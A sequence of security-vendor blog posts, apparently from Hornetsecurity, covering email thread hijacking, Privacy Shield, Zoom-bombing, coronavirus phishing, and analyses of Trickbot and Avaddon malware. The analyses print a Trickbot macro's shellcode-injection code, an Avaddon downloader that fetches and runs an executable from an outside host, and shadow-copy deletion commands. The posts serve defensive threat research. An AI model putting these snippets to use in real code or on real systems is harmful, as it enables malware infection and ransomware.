Email Conversation Thread Hijacking

Email Conversation Thread Hijacking


“You should only open email attachments and links from senders you know” is a common piece of advice when it comes to preventing email-based malware and phishing attacks. However, in this article we outline an attack technique called email conversation thread hijacking, which uses existing email conversations of its victims and thus trust relationships to spread to new victims. Against this attack the previous advice will not help. We explain how email conversation thread hijacking is used by attackers, and why it dramatically increases the likelihood for victims to open malicious links or malicious attachments.



Malicious actors try to get victims to open malicious links or malicious attachments. To this end, they often mimic genuine emails, such as invoices. However, if a victim is not customer of a particular company or service they will likely not open invoices claiming to be from those companies or services, especially knowing that this is the most common scheme for malicious actors to lure victims into executing their malware. Malicious actors are thus also often using current events to spark an interest in victims to open their malicious links or malicious attachments. Examples of such events are Christmas, Black Friday, Halloween, Valentines Day, but also currently the SARS-CoV-2 pandemic. However, users are often also aware of these schemes and do not open any malicious links or malicious attachments, especially when they come out of the blue without any context.

Hence, more and more attackers are leveraging a technique called email conversation thread hijacking, also known as email reply chain attack or email thread hijacking. In this technique, an attacker uses existing email conversations of victims to spread to new victims. Previously attackers only used the email addresses listed in victims address books. Email conversation thread hijacking uses also victim’s past existing email conversation threads to spread to new victims. To this end, the attackers will reply to the conversations the victim has in his mailbox.


How does email conversation thread hijacking work?

An email thread hijacking attack begins when a first victim is compromised. Next, their emails and often email login credentials are stolen. The attackers will then reply to the victim’s emails with their malicious messages.

In the following example, the “From” field contains the victim’s email address. The “To” field contains the email address of the targeted user, with which the victim had an email conversation previously. The “Subject” contains the original subject of the email conversation but is prepended with a “Re: “. The quote below the message contains the entire email conversation the two parties had.

Email conversation thread hijacking example

Good attackers also adapt the reply language to that of the hijacked email conversation, e.g., the following example uses a German language reply:

Email conversation thread hijacking example

While in the previous examples the malicious reply email contained a malicious link, these emails can also use malicious attachments:

Email conversation thread hijacking example


How effective is email conversation thread hijacking?

To demonstrate how effective email conversation thread hijacking is, we recreated a real email exchange that we observed during a routine false-positive email inspection:

Email conversation thread hijacking example

In this example, the attackers compromised Joe Schmoe’s email account and replied to an email that Joe has previously received from Alice. They replied with a malicious link (OPEN THE DOCUMENT) and some generic text. Alice released the email from quarantine and tried to open the malicious link, but her browser saved her from getting infected. She subsequently replied to Joe’s compromised email account that she can’t open “the file” and asked if “the file” could be sent in a different format. The attackers then send Alice another malicious link. While we are certain the attackers hijacking a previous hijacked email conversation thread again was coincidence, this example clearly shows how effective email conversation thread hijacking can be.

Fortunately, no attacker tailors their reply emails to fit into the hijacked conversation (yet). However, since threat actors have highly automated email conversation thread hijacking attack tools, the chances that the hijacked conversation involves documents that are shared back and forth is high. And even if it does not, who wouldn’t open a document sent by a known contact within an existing email conversation?


Who uses email conversation thread hijacking?

The number of threat actors using email reply chain attacks keeps increasing. While first observed in May 2017 in a limited targeted spearphishing campaign, many commodity threat actors adopted the technique in 2018.

In 2019, also Emotet adopted email conversation thread hijacking. To this end, they added an email-stealing module. The module steals emails and login credentials from victims and sends them to Emotet’s C2 servers, which distribute them to the systems of other victims infected with Emotet’s spam module, where they are used in attacks against new victims. Recently, Emotet has enhanced its email reply hijacking technique by also stealing attachments from victims and placing its malicious attachment among stolen benign attachments in order for the email to appear even more legitimate.

QakBot is also frequently distributed via replies to existing email conversation threads. In 2020, the Valek malware started to be distributed via email thread hijacking, too.

Hornetsecurity has observed an increase in compromised accounts being used to send malicious emails. While some do not (yet) use email conversation thread hijacking and simply misuse victims’ email accounts to send emails, with access to victims’ email accounts it is trivial to perform email reply chain attacks. A threat actor simply has to reply to emails received by his victims. We are therefore certain that the trend towards email thread hijacking attacks will continue. Therfore, users can no longer rely on a known trusted sender when deciding whether it is safe to open attachments or links.


Conclusion and Countermeasure

The advice to only open email attachments and links from known senders is outdated. With email conversation thread hijacking, even commodity threat actors can automate highly sophisticated and effective spearphishing emails. Often victims are not aware that they are compromised. In such cases it is important to inform victims that they are spreading malicious content via email so they can take measures against the compromise. Immediate actions should be to change the email login credentials. Secondary steps would be to determine how the attackers gained access to the email account in the first place to prevent such incidents in the future.

For humans it is very difficult, if not impossible, to spot email conversation threat hijacking because, by being sent from a legitimate but compromised account, the emails are – apart from the writing style – indistinguishable from real legitimate emails. However, email filters that inspect the attachments or links in emails can detect malicious content regardless.

Hornetsecurity’s Spam and Malware Protection, with the highest detection rates on the market, detects and quarantines threats regardless of whether they use email reply chain attacks or not. Also Hornetsecurity’s Advanced Threat Protection is not affected by email conversation thread hijacking and will inspect email contents regardless of whether it was sent from a compromised account or not. Hornetsecurity’s malware, phishing and ATP filters take precedence over sender allow lists. This way even if a allow-listed sender gets compromised and his email account is misused to send malicious emails, Hornetsecurity customers are protected.

Privacy Shield: Het einde van de trans-atlantische gegevensuitwisseling?

Privacy Shield: Het einde van de trans-atlantische gegevensuitwisseling?

Op 16.07.20 vernietigde het Europese Hof van Justitie het raamwerk voor gegevensbescherming tussen de VS en Europa. Hoewel dit niet meteen het einde betekent van de gegevensoverdracht tussen de twee continenten, heeft het verstrekkende gevolgen. Laten we er snel naar kijken.

Privacy Shield – Wat houdt het in?

De Data Agreement is begin 2016 in werking getreden als opvolger van de Safe Harbor Agreement. Het doel van het Privacy Shield was volgens de makers ervan om niet alleen wettelijke zekerheid te bieden voor burger met een hoger beschermingsniveau, maar ook voor Europese bedrijven die gegevens uitwisselen met de VS. Amerikaanse bedrijven zouden dus verplicht zijn de gegevens van EU-burgers op te slaan zolang ze voor het oorspronkelijke doel werden gebruikt. Deskundigen op het gebied van gegevensbescherming hadden vanaf het begin kritiek op deze overeenkomst, omdat zij vermoedden dat deze geen significante wijzigingen zou opleveren in vergelijking met de vorige Safe Harbor-overeenkomst.

Als voorbeeld, het Privacy Shield deed toenadering tot een betere gegevensbescherming, maar dit was nog lang niet volgens de Europese norm. Met name de Amerikaanse geheime diensten hadden zonder beperkingen toegang tot gegevens van EU-burgers. Dit feit bracht het Hof ertoe het Privacy Shield ongeldig te verklaren.

Weg met het Privacy Shield – en wat nu?

Kunnen er nog steeds gegevens tussen de VS en Europa worden uitgewisseld? Het is duidelijk dat het verwijderen van de Privacy Shield overeenkomst voor verwarring zorgt. Allereerst is het belangrijk te beseffen dat er onderscheid moet worden gemaakt tussen particulieren en bedrijven. Particulieren kunnen nog steeds privé e-mails naar de VS sturen of een boeking maken op een Amerikaanse website. Voor bedrijven ligt de situatie anders.

Ongeveer 5.000 bedrijven worden rechtstreeks getroffen door de beslissing van het Hof van Justitie, aangezien zij een beroep doen op de Privacy Shield bij het overdragen van gegevens naar de VS. Dit zijn onder meer bedrijven zoals Facebook, Microsoft en Amazon. Om ervoor te zorgen dat in eerste instantie juridische gegevensuitwisseling naar de Verenigde Staten door blijven gaan, kunnen bedrijven zich ook beroepen op de standaardcontractbepalingen die tot nu toe van kracht waren. Maar ook hier is de vraag: kunnen deze nog geldig zijn, ook al kunnen ze de toegang door geheime diensten niet uitsluiten?

Vooral Duitse experts op het gebied van gegevensbescherming beginnen te praten over de digitale onafhankelijkheid van Europa. De Berlijnse gegevensbeschermingsdeskundige Maja Smoltczyk roept bijvoorbeeld degenen die verantwoordelijk zijn voor de doorgifte van persoonsgegevens naar de VS op om over te schakelen naar dienstverleners in de EU om een passend niveau van gegevensbescherming te waarborgen.

Er kan daarom van worden uitgegaan dat er geen “groen licht” zal zijn over de gegevensbescherming discussie om de wettelijke onzekerheid te overwinnen.

Wat houdt dit in voor Hornetsecurity klanten?

In principe levert Hornetsecurity haar voornaamste dienstverlening vanuit Duitsland binnen beveiligde datacenters aldaar. Er is geen gegevensuitwisseling met de VS en Hornetsecurity wordt daarom niet rechtstreeks beïnvloed door dit besluit.

Alle subcontractors in een derde land in opdracht van Hornetsecurity, die het Privacy Shield hebben benoemd als basis voor gegevensoverdracht, hebben ook een alternatieve juridische grondslag, zodat als een juridische grondslag niet meer van toepassing is, een van de andere alternatieven het overneemt. De twee andere varianten voor de overdracht van gegevens uit Europese Economische Gebied naar andere landen, met name naar de Verenigde Staten, zijn bindende bedrijfsregels / bindende interne gegevensbeschermingsregels en EU-contractuele standaardbepalingen / EU-contractbepalingen. Onze klanten vinden de exacte informatie over onze subcontractors in de Order Processing Agreement in Annex 3.

Kan ook interessant voor u zijn:

Trickbot Malspam Leveraging Black Lives Matter as Lure

Trickbot Malspam Leveraging Black Lives Matter as Lure


The Hornetsecurity Security Lab has observed a Malspam campaign distribution Trickbot [1] that uses the Black Lives Matter movement as a lure to entice victims to open a malicious attachment. The Trickbot downloader document first injects shellcode into the WINWORD.EXE process. Then from that shellcode spawns a cmd.exe process into which it again injects more of the same shellcode. This cmd.exe process then downloads the Trickbot DLL and executes it via rundll32.exe.


The initial emails claim to be from the State office, Country authority, or Country administration:

Trickbot initial email.

The email tells the recipient they can Vote confidentially about "Black Lives Matter" or Tell your government your opinion, Give your opinion, and Speak out confidentially about "Black Lives Matter".

Attached is a file named e-vote_form_0000.doc, further suggesting the email to be some sort of official vote.

However, the document only displays an image announcing a fake Office update and instructions to “Enable Editing” as well as to “Enable Content”:

Trickbot document.

If the instructions are followed the malicious VBA macro in the document is executed and downloads the Trickbot malware.

Technical Analysis

The initial portion of the infection chain until the Trickbot malware is deployed is depicted in this flow chart:

Trickbot inital infection chain.

In the following analysis we will walk through each stage of this chain.

VBA macro

The VBA macro is protected against viewing in Word:

Trickbot protected macro.

However, this “protection” only prevents Word from showing the VBA macro without a password. The VBA macro code is still accessible.

The first thing the VBA macro does is display a fake error message:

Private Sub Document_Open()
    MsgBox "Error #80013123"

This results in the following pop up:

Trickbot fake error message

This is likely an attempt to probe for user interaction to bypass sandbox detections. It could also be an attempt to cover up that there is no document. A victim may be satisfied by receiving this error and assuming the document is broken.

The macro will use VirtualProtectEx and CreateThread to inject shellcode into the WINWORD.EXE process. To this end, the code assembles one large string:

    uriSubscriber = "i-j-[...]-a-a-a-"
    uriSubscriber = uriSubscriber & "i-l-[...]-a-a-"
    uriSubscriber = uriSubscriber & "g-k-a-a-p-p-h-f-p-i-[...]-o-g-c-c-p-k-h-c-g-j-h-d"

This string contains the encoded shellcode. It is then decoded via the following function:

    Dim f() As Byte
    ReDim f(0 To Len(uriSubscriber) / 2 - 1) As Byte
    Dim sSmart As Long, regOptimize As Long
    For Each destEnd In Split(uriSubscriber, "-")
        If sSmart Mod 2 Then
            regOptimize = sSmart - 1
            regOptimize = regOptimize / 2
            f(regOptimize) = (CByte(Asc(destEnd)) - CByte(Asc("a"))) + f((sSmart - 1) / 2)
            regOptimize = sSmart / 2
            f(regOptimize) = (CByte(Asc(destEnd)) - CByte(Asc("a"))) * 16
        End If
        sSmart = sSmart + 1

Last but not least, the decoded shellcode is set to PAGE_EXECUTE_READWRITE using VirtualProtectEx which was previously aliased to extensionsComment and then a thread is started using the address of the shellcode as the thread’s start address using CreateThread which has been alias to sMail:

    Private Declare Function extensionsComment Lib "kernel32" Alias "VirtualProtectEx" ( _
        iMail As Long, _
        bConsole As Long, _
        regFunction As Long, _
        tablePosition As Long, _
        colMail As Long) As Long
    Private Declare Function sMail Lib "kernel32" Alias "CreateThread" ( _
        textTimer As Long, _
        uriMail As Long, _
        m As Long, _
        dateMembers As Long, _
        textTimer0 As Long, _
        lServer As Long) As Long
    sConsole = destN_ - angleTexture + UBound(f)
    q = extensionsComment(ByVal ipFunction, ByVal angleTexture, ByVal sConsole, ByVal PAGE_EXECUTE_READWRITE, ByVal VarPtr(extensionsComment0))
    adsLogon = sMail(ByVal 0&, ByVal 0&, ByVal destN_, ByVal 2&, ByVal 0, ByVal 0&)
    adsScr 5000

The shellcode can most easily be extracted by breaking on CreateThread in a debugger:

Tickbot shellcode extraction via x64dbg.


The shellcode running in the WINWORD.EXE process first resolves several library functions. Then uses CreateProcessA to run a cmd.exe with the pause command, causing the cmd.exe to idle:

Trickbot shellcode spawning cmd.exe with pause command

Next, the shellcode uses a classic OpenProcess, VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread sequence to do shellcode injection into the paused cmd.exe process:

Trickbot shellcode injection into cmd.exe process.

The cmd.exe /c pause process is likely used to evade detections of creating a processes with the CREATE_SUSPENDED flag. A technique that is usually used to start a processes in the suspended, i.e., paused, state, to then inject code into it, and then resume it.

The injected shellcode is the same shellcode that was injected into the WINWORD.EXE process, however, the entry point passed to CreateRemoteThread is different resulting into a different execution flow for the shellcode execution within the cmd.exe process.

Shellcode cmd.exe

The shellcode in the cmd.exe process will also resolve several library functions. Additionally, it will decode the Trickbot download URLs.

Next, the shellcode will query GetSystemMetrics(SM_CXSCREEN) and GetSystemMetrics(SM_CYSCREEN) to get the display resolution. Then GetCursorPos is queried twice, with a call to Sleep(0x1388) in between causing a 5 second delay.

Trickbot profiling the system.

This is likely done to verify mouse movement and avoid sandboxes.

The data is then encoded as a HTTP query string as follows: &scr=1280x1024&cur1=604x250&cur2=622x310

The download URLs are appending with an ID query string &id=00000000 and the above system metrics query string forming the final download URL which is then queried via InternetOpenUrlA:

Trickbot using InternetOpenUrlA to download.

In case the download is successful the downloaded file is written to C:\\Users\\<username>\\AppData\\Local\\system.rre and executed via rundll32.exe %userprofile%/system.rre,Initialize using ShellExecuteA. The system.rre file is the Trickbot DLL.

In case the download is not successful the downloader sleeps and then a second download URL is tried.

Conclusion and Remediation

The double shellcode injection is likely used to evade behavioral detection as WINWORD.EXE usually does not download files from the Internet nor execute rundll32.exe. Hence, such anomalous behavior is more likely detected than cmd.exe spawning the rundll32.exe process. The query for the systems display resolution as well as double query of the cursor position is also likely done to avoid delivering the Trickbot DLL to sandbox systems.

Hornetsecurity’s Spam and Malware Protection with the highest detection rates on the market already detected and blocked the malicious Trickbot document based on a detection signature.

In case the basic detection signatures would have not blocked the emails Hornetsecurity’s Advanced Threat Protection (ATP) would not have been impacted by the various anti-sandbox mechanisms either. The human interaction simulation of the ATP sandbox successfully clicks the fake error message away for a complete execution of the malicious document:

Hornetsecurity Advanced Threat Protection sandbox clicking button

It detects the processes being created by the document, as well as the process injections:

Hornetsecurity Advanced Threat Protection sandbox detecting process injection

The human interaction simulation also results in the two queried cursor positions, send as cur1 and cur2 to the Trickbot download server, to differ:

Hornetsecurity Advanced Threat Protection sandbox Internet connection

This way Hornetsecurity’s ATP sandbox is not fooled by the various anti-sandbox techniques.


Indicators of Compromise (IOCs)


SHA256 Filename Description
d6a44f6460fab8c74628a3dc160b9b0f1c8b91b7d238b6b4c1f83b3b43a0463d e-vote_form_1967.doc Trickbot downloader document


  • hxxps[:]//ppid.indramayukab.go[.]id/may.php?omz=1&pic=b&id=[0-9]{8}&scr=[0-9]{3,4}x[0-9]{3,4}&cur1=[0-9]{3,4}x[0-9]{3,4}&cur2=[0-9]{3,4}x[0-9]{3,4}
  • hxxps[:]//www.inspeclabeling[.]com/wp-content/themes/processing/may.php?omz=1&pic=b&id=[0-9]{8}&scr=[0-9]{3,4}x[0-9]{3,4}&cur1=[0-9]{3,4}x[0-9]{3,4}&cur2=[0-9]{3,4}x[0-9]{3,4}


Avaddon: From seeking affiliates to in-the-wild in 2 days

Avaddon: From seeking affiliates to in-the-wild in 2 days


On 2020-06-03 it was reported [1] that a new ransomware calling itself Avaddon was seeking partners for their affiliate program, i.e., someone installing the ransomware on victim systems. Just two days later on 2020-06-05 malspam distributing the Avaddon ransomware has been observed.

This article briefly outlines the first wave of malspam distributing Avaddon ransomware as observed by Hornetsecurity’s Security Lab.


The initial email of the Avaddon ransomware uses a pretend image lure:

Initial email

The attached ZIP archive contains a JSript file that upon execution will download and execute the Avaddon ransomware binary:

Content of ZIP

Technical Analysis

In the following we will analyze the malicous email, the JScript downloader, and last but not least the downloaded Avaddon ransomware binary.


Emails are send from <name>[0-9]{2}@[0-9]{4}.com sender email addresses. Most of the four number dot com domains ([0-9]{4}.com) are parked domains without any SPF records, hence, blocking on policy grounds is not possible.

The malspam distributing Avaddon ransomware started on 2020-06-04 at around 14:00:00 UTC and are still lasting while writing this report:

Avaddon ransomware malspam wave timeline

The observed wave seems to target CA (Canada):

Avaddon ransomware wave recipient countries

The recipient industries seem to indicate a focus on education institutions at the receiving end of this wave:

Avaddon ransomware wave recipient industries

However, because this is only data from the first wave this should not be interpreted as the final targeting of the Avaddon ransomware.

JScript Downloader

The attachment contains the IMG000000.jpg.js JScript downloader:

Avaddon IMG000000.jpg.js JScript downloader

The Avaddon downloader script is simply:

var jsRun=new ActiveXObject('WSCRIPT.Shell');
jsRun.Run("cmd.exe /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('hxxp[:]//217.8.117[.]63/sava[.]exe','%temp%\\5203508738.exe');Start-Process '%temp%\\5203508738.exe'",false);
jsRun.Run("cmd.exe /c bitsadmin /transfer getitman /download /priority high hxxp[:]//217.8.117[.]63/sava[.]exe %temp%\\237502353.exe&start %temp%\\237502353.exe", false);

It uses both PowerShell and the BITSAdmin tool to download the sava.exe Avaddon ransomware file to %temp%\\5203508738.exe and %temp%\\237502353.exe respectively and execute it:

Avaddon ransomware downloader process tree

Avaddon Ransomware sava.exe

The Avaddon ransomware executable is not packed. However, its strings appear Base64 encoded using a custom alphabet. Imports are freely accessible. The Avaddon ransomware uses the Windows crypto API to generate an AES key, with which it then (presumably) encrypts the data. The generated AES key is then exported and encrypted via a previously from the ransomware binary imported key:

Avaddon ransomware generating AES key

Further the Avaddon ransomware deletes the volume shadow copies via wmic.exe SHADOWCOPY /nointeractive and vssadmin.exe Delete Shadows /All /Quiet.

After encryption the Avaddon ransomware changes the desktop background notifying the victim that files have been encrypted and where the instructions to pay the ransom are located:

Avaddon ransomware desktop background

The Avaddon ransomware leaves a file named [0-9]+-readme.html in every directory it encrypts. This file contains the instructions and an .onion link to the ransomware panel:

Avaddon ransomware ransom note

Victims are expected to copy their ransom ID to the linked .onion Tor hidden service website then received further instructions on how to pay the ransom and receive a decrypter.

Conclusion and Remediation

As can be seen from this example malware underground collaboration can speed up the proliferation and distribution of new ransomware.

Hornetsecurity’s Spam and Malware Protection with the highest detection rates on the market already detects and blocks the outlined threat. Hornetsecurity’s Advanced Threat Protection extends this protection by also detecting yet unknown threats.


Indicators of Compromise (IOCs)


SHA256 Filename Description
05af0cf40590aef24b28fa04c6b4998b7ab3b7f26e60c507adb84f3d837778f2 sava.exe Avaddon ransomware


  • hxxp[:]//217.8.117[.]63/sava[.]exe
“Zoom-bombing”-Aanvallen tijdens COVID-19: Hoe kan ik mezelf beschermen?

“Zoom-bombing”-Aanvallen tijdens COVID-19: Hoe kan ik mezelf beschermen?

De video conferentie software Zoom geniet een enorme populariteit vanwege dat er massaal wordt thuisgewerkt. Helaas zijn er zorgen gerezen over de beveiliging van de tool. Het was voor niet-betrokken partijen mogelijk om deel te nemen aan meetings van anderen en ongewenste of weerzinwekkende inhoud bij te dragen – het fenomeen kreeg de naam ‘Zoom-bombing’. In de volgende blogpost hebben de experts van Hornetsecurity enkele tips over hoe je Zoom veilig kunt gebruiken.

In maart 2020 bereikte Zoom 200 miljoen gebruikers in één dag

Tijdens de lockdown veroorzaakt door de huidige Coronavirus COVID-19 crisis zijn steeds meer bedrijven en mensen begonnen met het gebruik van video conferentie tools, of het nu is om hen te helpen bij het werken vanuit huis, online lessen te geven, hun familie of vrienden te zien, of zelfs online feesten te organiseren. Dankzij dit type video conferentie technologie worden deze moeilijke dagen wat aangenamer gemaakt. Kun je je voorstellen dat je tijdens deze crisis geen videoconferenties kunt houden, vooral als bedrijf zijnde?

Voor veel patiënten die geïsoleerd zijn zonder hun familie te kunnen zien, geeft verbondenheid via een videoconferentie hen de mogelijkheid om hun familieleden te zien en zich niet alleen te voelen terwijl ze herstellen. Zelfs als het via het scherm van een smartphone of tablet is, is het belangrijk om zich gesteund te voelen tijdens deze moeilijke tijden…

Als gevolg van de huidige situatie bereikte Zoom in maart 200 miljoen gebruikers per dag volgens de gegevens van het bedrijf. Vergeleken met december 2019, toen was het maximale aantal gebruikers per dag aan Zoom-videogesprekken slechts 10 miljoen.

Nieuw type hacken: “Zoom-bombing”

Helaas geprofiteren cybercriminelen van de corona virus situatie, op 30 maart heeft de FBI het publiek op de hoogte gebracht van de opkomst van hijackings gevallen via videoconferentie, ook wel ‘Zoom-Bombing’ genoemd. De FBI heeft meerdere meldingen ontvangen van educatieve lezingen die onderbroken zijn door pornografische afbeeldingen en/of tot het aanzetten van haat en bedreigende taal. Het Amerikaanse Huis van Afgevaardigden was recente slachtoffer van een cyberaanval van ‘Zoom-bombing’.

De meeting werd bij ten minste drie afzonderlijke gelegenheden onderbroken door ongenode aanwezigen, zoals onlangs gerapporteerd in een interne brief aan Carolyn Maloney (Republikeinse voorzitster van New York), voorzitter van de Oversight and Reform Committee, wat het belangrijkste onderzoek comité is van het Amerikaanse Huis van Afgevaardigden.

Ook meldde het INCIBE (National Cybersecurity Institute in Spanje) een kwetsbaarheid in het Windows-besturingssysteem waardoor een cybercrimineel via Zoom de gebruikersnaam en hash van het toegangswachtwoord van het slachtoffer kon stelen. Door diezelfde kwetsbaarheid kon de cybercrimineel bovendien bestanden en programma’s activeren vanaf de aangevallen computer. Dit gold voor Windows-gebruikers met oudere versies dan 4.6.9.

Verder is vastgesteld dat phishing-e-mails naar gebruikers worden gestuurd in de naam van Zoom. Deze e-mails bevatten valse Zoom meeting meldingen voor aankomende videoconferenties met hun managers, zodat gebruikers zich laten opjagen en misleiden waardoor ze hun inloggegevens invoeren op een nep Zoom registratie page. Met de gestolen inloggegevens krijgen hackers toegang tot de accounts en dus ook tot de meeting IDs. Ze verkopen deze informatie op het dark web of geven het zelfs gratis weg, zodat het kan worden gebruikt voor “Zoom-bombing” aanvallen.

Wat kunnen we doen om “Zoom-bombing” te voorkomen?

Gebruikers kunnen het probleem van “Zoom-bombing” al voorkomen door de volgende aanpassingen aan te brengen in hun zoominstellingen:

  • Zorg ervoor dat de meeting is aangemaakt met encryptie*
  • Creëer “waiting rooms” voor bezoekers
  • Vereis dat de gastheer aanwezig is voordat de meeting begint
  • Audio-handtekeningen
  • Activeer / deactiveer de mogelijkheid om op te nemen door één deelnemer of alle deelnemers
  • Tijdelijke pauze om het scherm vrij te geven wanneer een nieuw venster wordt geopend
  • Bescherm de meeting met een wachtwoord

*Chat Encryption:Zoom gebruikt zowel asymmetrische als symmetrische algoritmen om de chatsessie te versleutelen. Sessiesleutels worden gegenereerd met een apparaat unieke hardware ID om te voorkomen dat gegevens van andere apparaten worden gelezen.

Chat encryption setting in Zoom conferences

Figuur 1: Encryptie-instelling in zoomconferenties

Host setting in Zoom conferences

Figuur 2: Gastheerinstelling in zoomconferenties

Naast de juiste Zoom-accountinstellingen, is het ook cruciaal om applicaties van derden te gebruiken om uw e-mailaccount te beschermen tegen phishing-aanvallen die proberen Zoom-inloggegevens te verkrijgen.


Al deze maatregelen zullen u helpen potentiële cyberaanvallen door Zoom-bombing te voorkomen. Er moet echter speciale aandacht worden besteed aan e-mailcommunicatie, aangezien dit de meest gebruikte manier is door cybercriminelen, wat wederom blijkt uit de phishing-e-mails voor het verkrijgen van Zoom-inloggegevens.

Een oplossing is de Advanced Threat Protection service van Hornetsecurity, die uw e-mailaccount beschermt tegen dit soort phishing-cyberaanvallen. Het maakt ook gebruik van innovatieve detectiemechanismen: de nieuwste technologie van freezing, URL-scanning -rewriting en sandboxing om hackers weg te houden van uw Zoom-inloggegevens en alle andere gevoelige gegevens.

We kunnen niet toestaan dat cybercriminelen profiteren van de huidige Coronavirus COVID19 crisis of dit nu via Zoom of een andere teleconferentie videoservice is – het is nu een essentiële behoefte geworden om met onze collega’s, familie en vrienden te communiceren.

  • FBI. FBI Warns of Teleconferencing and Online Classroom Hijacking During COVID-19 Pandemic. [abgerufen am 30.04.2020]
  • INCIBE (National Spanish Institite of Cybersecurity). Vulnerabilidad descubierta en el sistema de videoconferencia Zoom. [abgerufen am 06.04.2020]
  • FORTUNE. Zoom meetings keep getting hacked. Here’s how to prevent ‘Zoom bombing’ on your video chats. [abgerufen am 04.04.2020]
  • BLOOMBERG. Zoom Grapples With Security Flaws That Sour Users on App [abgerufen am 02.04.2020]
  • TECHCRUNCH. Ex-NSA hacker drops new zero-day doom for Zoom [abgerufen am 01.04.2020]
  • THREATPOST. Zoom Bombing Attack Hits U.S. Government Meeting [abgerufen am 17.04.2020]
  • Letter of USA Committe. Letter to Chairwoman Maloney [abgerufen am 10.04.2020]
  • BLEEPING COMPUTER. Phishing uses lay-off Zoom meeting alerts to steal credentials [abgerufen am 24.04.2020]
  • FORBES. New Phishing Attacks Prey On Job Loss Fears With Fake Zoom Meeting Invites [abgerufen am 28.04.2020]
  • Coronavirus is also dangerous by email

    Coronavirus is also dangerous by email

    Hornetsecurity warns of phishing and malware attacks that pretend to be from global health organizations

    Reports of new cases of Coronavirus infection are appearing rapidly. The pictures of sealed-off cities and people in quarantine suggest a horrifying scenario. But the virus is not only a risk in the analogue world: the growing fear is shamelessly exploited by cyber criminals with targeted phishing and malware campaigns. Sadly, there is now a Coronavirus infection risk via email.

    Since the beginning of February, the Hornetsecurity Security Lab has observed an increased volume of emails sent in the name of the World Health Organization and the Centers for Disease Control and Prevention. The messages explicitly take advantage of people’s fear of the virus.

    For example, a link provides an alleged list of new cases of infection in the immediate vicinity. The recipient would be able to access this list by entering an email address and a password. This is a classic phishing email that is intended to steal sensitive data. In other cases a download link or an attached document is offered. Both promise information on security measures to protect against infection.

    If the link is clicked or the document is opened, a malicious file will be downloaded. There is a substantial risk that the IT system could be infected with a virus or ransomware.

    Increase in attacks that reference current events

    The experts at Hornetsecurity point out that more and more often, current events with a high emotional charge are being used as hooks for large-scale phishing and malware campaigns. By exploiting people’s emotions, cyber criminals know their emails will receive more attention and be seen as more credible. The probability that the messages will be opened increases.

    The Coronavirus mailing is only one of many current cases. There have been similar mail attacks referencing the climate protests initiated by Greta Thunberg, GDPR and the bush-fires in Australia—all of these are actual exploits that have been intercepted by Hornetsecurity.

    Since email communication in companies is still the number one gateway for cyber attacks, employees must be made aware of this issue in addition to setting up effective protection mechanisms. Detecting phishing emails is not easy – but not impossible either. To vet suspicious messages, the following areas should be checked:

    • The sender’s email address can provide information about the true origin of the message. If it is not plausible or contains spurious letters or cryptic symbols, this is a warning sign.
    • Large-scale phishing campaigns often only use a generic form of address for the recipient.
    • Incorrect spelling and grammar and an unprofessional layout are also an indication.
    • The use of pressure is a common tactic. This is intended to undermine critical thinking.
    • Cyber criminals often try to get the recipient to open a URL or attachment. Email attachments can present serious risks.